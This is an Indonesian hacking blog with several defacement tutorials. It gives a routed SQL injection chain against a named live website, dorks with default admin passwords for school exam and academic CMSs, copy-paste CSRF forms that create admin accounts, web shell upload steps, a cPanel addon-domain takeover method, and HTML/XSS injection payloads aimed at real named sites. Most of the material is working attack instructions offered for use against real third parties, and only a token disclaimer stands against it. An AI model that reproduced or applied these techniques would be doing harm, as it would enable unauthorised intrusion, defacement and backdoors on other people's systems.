Tuesday, June 23, 2020

Routed SQL-injection

Yow Whatsapp crew,
Wellcome back with me.
Kali ini gua bakal ngebahas Routed SQL-injection.

Bahan bahan :
- Kouta :v

Site :
http://www.jeffreycarbo.com/page.php?name=3

How to Inject
 http://www.jeffreycarbo.com/page.php?name=3 muncul error tapi jangan pedulikan hal tersebut karena itu adalah halaman normalnya

Ketika saya order by 2 muncul error http://www.jeffreycarbo.com/page.php?name=3'+order+by+2--+- tapi di order by 1 error tersebut hilang

Jadi saya union select menggunakan column 1 tersebut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+- tapi tidak terjadi apa apa karena website tersebut vuln terhadap Routed sqli, cara mengetahuinya adalah

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1'--+-  ubah 1' menjadi hex jika normal berarti vuln terhadap Routed sqli

Lanjut ke exploit tambahkan seperti berikut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'"--+- dan anggap saja angka 1 tersebut menjadi parameter, tapi jangan sampai hilangkan " "

Lalu kalian order by lagi di parameter "1'" Seperti berikut http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'+order+by+7--+-"--+- kalian cari sampai error lalu kalian union select sepertu biasa :D

Dan hasilnya :
http://www.jeffreycarbo.com/page.php?name=3%27+and+0+/*!50000union*/+/*!50000select*/+%221+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--+-%22--+-

Sekian materi kali ini,

Monday, June 15, 2020

Cara Deface Sistem Informasi Akademik U/P Default

Yow whatsapp, 
Wellcome back with me. 
Kali ini kita akan membahas proof of concept yang msh baru xixixi....
Yaitu Sisfo (Sistem Formasi Akademik) Default User and Pass. Bug ini terjadi karna kelalain admin. Kenapa bisa begitu? Ya karna si admin lupa untuk mengganti pass defaultnya sehingga kita bisa login ke dashboard admin menggunakan User dan Pass default. 

Bahan bahan :
- Kouta 
- Dork :
"Sisfo Login"
"Sistem Informasi Akdemik"
"Login | Sisfo"
*Kembangin lagi gayn
- Info login :
User : admin
Pass : admin
Atau
User : admin
Pass : admin123

Langsung aja :D
Pertama kalian dorking dulu menggunakan dork diatas xixi.. 

Nah akan otomatis ke halaman admin login, lalu kalian login menggunakan info login yang saya sediakan diatas... 

Jika vuln akan masuk ke dashboard admin :D
Seperti gambar dibawah ini. 

Cara Upload shellnya kalian ke bagian profil guru >> Upload shell
Lalu kalian refresh >> klik kanan pada img yang retak atau klik lama pada android >> buka gambar di tab baru.. 
Jika 403 Forbidden kalian bisa coba dengan cara di bawah ini :
Thanks to : ali

Sekian dari saya,
Always Study

Sunday, June 14, 2020

Default U/P On Cms Zya CBT

Yow Exploiter, 
Sorry gua jarang upload soalnya sibuk.
Langsung aja tanpa basa basi.

#Title : Default U/P On Cms Zya
#Dork : intext:"© achmadlutfi.wordpress.com"
#Author : Echhi atau Shandi1337
#Admin Login :
- www.echhixploit.com/index.php/manager
- www.echhixploit.com/[Path]index.php/manager
#User and Pass : admin

Kalian tinggal login ke admin login dengan user dan password diatas.
Boom berhasil login, xD
Artikel cukup singkat karna emng singkat :v
Note : Artikel ini hanya untuk pembelajaran, saya tidak bertanggung jawab jika jika ada penyalahgunaan.
Refrensi :
https://ecchiexploit.blogspot.com/2020/06/exploit-zyacbt-default-user-pass.html?m=1

Wednesday, June 10, 2020

Cara Deface Sistem kelulusan Add Admin

Yow Whatsapp guys,
Wellcome back with me.
 Kali ini kita akan membahas cara deface sistem kelulusan add admin, sama kyk cbt v2.8 add admin xixi..

Bahan bahan :
1.Kouta :v
2.Csrf :
Kalian copas aja..
<html>
<body>
<center>
<iframe width="560" height="315" src="https://www.youtube.com/embed/iQjtQvHwi4c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<hr>
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama" placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username" placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass" placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data" class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>
 Dork : intext:"Selamat datang di Sistem"
Author : Spear Security

Pertama kalian copy dan paste ke file csrf.html.
Kedua, ganti localhostnya jadi live target kalian.
Kalian masukan user dan password terserah kaliankalian >> klik simpan data. Jika berhasil akan seperti gambar dibawah.

Jika sudah kalian login, jika berhasil berarti vuln :D

Thursday, May 28, 2020

Candy CBT v2.8.0 r Add Admin

Yow Exploiter,
Kembali lagi ke My Blog xixi..
Kali ini kita akan belajar cara deface CBT v2.8.0 Add Admin yang di temukan oleh ecchiexploit

Bahan Bahan :
- Kouta :v
- Csrf :
*kalian copas aja
<html>
<head></head>
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
- Dork :
"CBT v2.8.0" intitle:login
"Responsive Image" + "Support" intitle:Login
- Shell Backdoor

Langsung aja, pertama kalian dorking dulu pake dork diatas :D
Jangan lupa buat file csrf.html dan masukan kode diatas xixixi... 

Nah jika udah dapet live targetnya kalian buka file csrf.htmlnya lalu edit di bagian :
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
Localhostnya kalian ganti menjadi live target kalian... 
Jika sudah kalian save filenya lalu buka di chrome atau browser kesayangan anda :v

Nah tampilannya akan seperti dibawah ini :
Tinggal kalian masukan terserah kalian xixix.. 
Tapi saya mengisi semuanya dengan admin hehehe

 Lalu klik simpan.
Kalian login dengan User Dan Pass yang kalian tadi pilih.

Jika Vuln Akan Langsung masuk Dashboad :D seperti gambar dibawah :
Cara upload shellnya :
Klik Pengaturan >> Lalu Ke Restore&Backup :D >> Up Shell Kalian >>  Lalu kalian klik buttonnya

Cara manggil shellnya :
contoh : namaweb.com/admin/namashellkalian.php
atau 
- namaweb.com/[Path]/admin/namashellkalian.php

Semoga Bermanfaat :D
Referensi :


Wednesday, May 27, 2020

Cara Deface Myhoian U/P default

Yow whatsapp guys,
Kembali lagi ke my blog xixix..
Kali ini kita akan deface metode Myhoian User Pass default.

Bahan bahan :
- Kouta :v
- Dork
"Design" + "myhoian"
"Design by myhoian.com"
- Info Login :
User : nhaplieu
Pass : 12345
~
User : nhaplieu
Pass : nguyenvu!@#
- Admin login :
namaweb.com/admin

Kalian ngedork dulu, pake dork diatas :v

Jika sudah, kalian masuk ke website dan akses adminnya dengan cara tambahkan /admin >> untuk mencari admin login xixix..

Tampilan loginnya akan seperti ini.
Kalian masuk menggunakan Info Login diatas xixi..
Jika Vuln akan masuk ke dashboard admin, lalu kalian tinggal up shell :D

Referensi :
https://draxploit.blogspot.com/2020/05/myhoian-default-userpass-admin-login.html?m=1

Tuesday, May 26, 2020

Cara Deface Remote DNS with Cpanel

Hallo exploiter,
Kembali lagi sama saya Nararya.
Kali ini kita akan belajar cara deface remote dns. Sebelum itu pasti bakalan banyak yang nanya ke saya, "Bang, bukannnya sama kayak take over domain?" Beda gan.
Kalo take over domain itu kita istilahnya membakitkan website yang sudah mati , tapi remote dns seperti menambahkan cpanel pada suatu website yang tidak memiliki cpanel. Ya initinya website yang semulanya tidak ada cpanel setelah diaddon langsung ada cpanel, ini hanya berlaku untuk satu server saja. Msh kurang ngerti? bisa chat saya aja xixix..

Bahan bahan :
- Cpanel tentunya yang addon domainsnya tidak nol dan support remote dns
- kouta gan :v
- alat :
https://dnslytics.com/reverse-ip
- kesabaran xixixi..
- Exploit :
namaweb.com/cpanel >> untuk mengetahui website menggunakan cpanel atau tidak
- Sc deface atau Shell backdoor

Pertama seperti biasa kalian copy ip cpanel kalian..
Lalu kalian buka website https://dnslytics.com/reverse-ip
Lalu kalian pastekan saja dikolom search..

Nanti ada banyak ip dan website tuh, kalian pilih aja satu.
Lalu kalian buka website yang kalian copy dan masukan exploitnya.
Jika website tidak menggunakan cpanel saat diberi exploit, website akan 404 not found dll Namun jika ke redirect ke login cpanelnya berarti websitenya tidak bisa di remote dns.

Seteah mengetahui website tidak menggunakan cpanel kalian buka cpanel kalian yang satu server dengan website yang tadi kalian copy.
Lalu klick addon domains >> pastekan websitenya tanpa https atau http.

Jika vuln akan muncul seperti gambar dibawah ini.
*note:pict lama gan... soalnya males screenshoot lagi xixi..
Kalian upload aja index.php kalo cuman mau nitip file engga bisa gan, nanti takutnya index of atau forbiden :D. Jika setelah up shell atau sc deface kalian tunggu kurang lebih 15 menit ya teman teman.

Sekian materi dari saya
Semiga bermanfaat xixixi..

Monday, May 25, 2020

Cara Deface Moxiencode File Browser

Yow Whatsapp guys
Kembali lagi ama blog kesayang xixix.. 
Kali ini kita akan belajar cara deface Moxiencode File Browser. 
Gua tau proof of concept nya dari F3RGUS0 xixi.. Kalian bisa ke channel dia di link dibawah ini.
https://youtu.be/ZMCVF466FEw

Bahan bahannya :
- Kouta :v
- Dork
intitle:Moxiencode File Browser
filetype:php
inurl:filemanager/frameset.php
- Sc Deface *maksimal 10mb
- Exploit :
/files >> buat jaga jaga aja kalo ada yang engga paham :v
- Live Target :
http://www.csgchristianity.com/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager

Langsung aja kalian buka chrome lalu dorking dengan dork diatas xixi..
Karna mimin udah dikasi live target pake live target aja :v

Kalian klik icon upload seperti gambar dibawah ini
atau bisa juga masukan exploitnya yaitu /files.

Jika sudah tampilanya akan seperti ini...
Kalian langsung aja upload sc deface kalian :D
Abistu show off deh :v
 Cara panggilnya gampang
Contoh :
http://www.csgchristianity.com/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/namascdeface.html

Sekian dari saya,
Semoga bermanfaat xixi.. 

Cross Site Scripting (XSS) pada Parameter

Cross Site Scripting (XSS) pada Parameter
Yow Whatsapp guyss :v
Wellcome to My Blog xixix..
Nah kali akan membahas XSS pada parameter.
Biasanya Web berparameter vuln terhadap sqli(jika blom dipacth), nah sekarang gua bakal bagiin XSS dan HTML inject. Langsung kalian simak aja soalnya ezz gan :v
# Title: Switch Cross Site Scripting (XSS)
# date: 2020-05-23
# Vendor Homepage: Switch.sc and alert
# Tested on: Windows 7 & Google Chrome
# Vulnerable File: /gallery.php?img=
# My Payload : https://pastebin.com/TwQesM5Q
*Pake web vuln sqli juga bisa gan yang penting isi parameter xixi..

Live Target : http://www.sunresort.sc/en/gallery.php?img=1

Kalian masukan payloadnya.. dengan cara menghapus angka 1 dan memasukan payloadnya
Contoh :
http://www.sunresort.sc/en/gallery.php?img=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

http://www.stmik-time.ac.id/cari.php?txtcarikonten=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

Nah gampang kan temen temen :D
Ini Termasuk Bug XSS dan engga senua website berparaneter vuln XSS ini xixi..
Kalian bisa juga baca artikel lain hehehe :)
Referensi :
https://cxsecurity.com/issue/WLB-2020050186